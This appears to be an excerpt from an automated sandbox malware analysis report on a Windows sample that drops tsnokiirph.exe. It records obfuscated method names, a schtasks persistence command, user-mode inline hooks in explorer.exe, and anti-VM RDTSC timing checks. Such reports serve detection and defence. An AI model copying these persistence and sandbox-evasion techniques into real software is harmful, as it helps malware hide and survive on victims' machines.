Source: 0.2.22#U0415.exe.4484980.9.raw.unpack, IvcPPEq9R8umsYYues.cs	High entropy of concatenated method names: 'tPLE2IlgVx', 'E6IEbnDUDS', 'cPtEpAtYFL', 'PhREuyrjts', 'XC3EHSoqSB', 'QKTE6FE8vS', 'ua0ELrLPJg', 'TR7EqPhxDS', 'WKLENcud4C', 'Ct6EDdIeBY'
Source: 0.2.22#U0415.exe.4484980.9.raw.unpack, UWBRyjgOr3dP82mW5w.cs	High entropy of concatenated method names: 'BiL4bePa9D', 'WqU4pRQY9j', 'OOn4uISqG8', 'it44HZD5Ga', 'k0e46R8tl3', 'IUQ4L5pKxC', 'Mn84qjUllT', 'Ydo4NKRTip', 'QsP4D5cPmD', 'xsM4eE5IRD'

Source: C:\Users\user\Desktop\22#U0415.exe

File created: C:\Users\user\AppData\Roaming\tsnokiirph.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\22#U0415.exe

Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tsnokiirph" /XML "C:\Users\user\AppData\Local\Temp\tmp7F5F.tmp

Hooking and other Techniques for Hiding and Protection

Modifies the prolog of user mode functions (user mode inline hooks)

Source: explorer.exe

User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8C 0xCE 0xE0

Source: C:\Users\user\Desktop\22#U0415.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: tsnokiirph.exe PID: 7108, type: MEMORYSTR

Tries to detect virtualization through RDTSC time measurements

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	RDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	RDTSC instruction interceptor: First address: 0000000000409B6E second address: 0000000000409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\systray.exe	RDTSC instruction interceptor: First address: 0000000002E79904 second address: 0000000002E7990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\systray.exe	RDTSC instruction interceptor: First address: 0000000002E79B6E second address: 0000000002E79B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\colorcpl.exe	RDTSC instruction interceptor: First address: 0000000000549904 second address: 000000000054990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\colorcpl.exe	RDTSC instruction interceptor: First address: 0000000000549B6E second address: 0000000000549B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 6_2_00409AA0 rdtsc

6_2_00409AA0

Source: C:\Users\user\Desktop\22#U0415.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5022	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3824	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 1283	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 8657	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 879	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 869	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Window / User API: threadDelayed 1920	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Window / User API: threadDelayed 8051	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	API coverage: 1.7 %
Source: C:\Windows\SysWOW64\systray.exe	API coverage: 1.8 %

Source: C:\Users\user\Desktop\22#U0415.exe TID: 6464	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6976	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7108	Thread sleep count: 1283 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7108	Thread sleep time: -2566000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7108	Thread sleep count: 8657 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7108	Thread sleep time: -17314000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe TID: 6352	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe TID: 7064	Thread sleep count: 1920 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe TID: 7064	Thread sleep time: -3840000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe TID: 7064	Thread sleep count: 8051 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe TID: 7064	Thread sleep time: -16102000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
